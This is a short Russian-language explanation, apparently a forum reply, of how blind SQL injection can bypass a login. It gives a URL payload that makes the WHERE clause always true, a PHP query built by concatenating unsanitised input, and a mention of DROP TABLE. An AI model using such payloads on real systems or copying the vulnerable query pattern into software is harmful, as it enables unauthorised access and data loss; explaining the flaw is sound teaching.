Blind означает лишь то, что результат инъекции не отображается на странице. При этом всё равно существуют методы, позволяющие при удаче авторизоваться не зная пароля, например такой конструкцией:
http://my.site/login.php?name=user' OR TRUE OR '1'='1&password=
Если запрос на авторизацию к базе выглядит так:
"WHERE `user` = '".$_GET['name']}."' AND `pass` = '".md5($_GET['password'])."'"
то он преобразуется в
WHERE `user` = 'user' OR TRUE OR '1'='1' AND `pass` = 'd41d8cd98f00b204e9800998ecf8427e'
результат вычисления будет TRUE для любого пользователя и пароля.
Кроме того, можно разрушить саму базу, выдав команды DROP TABLE или DROP DATABASE
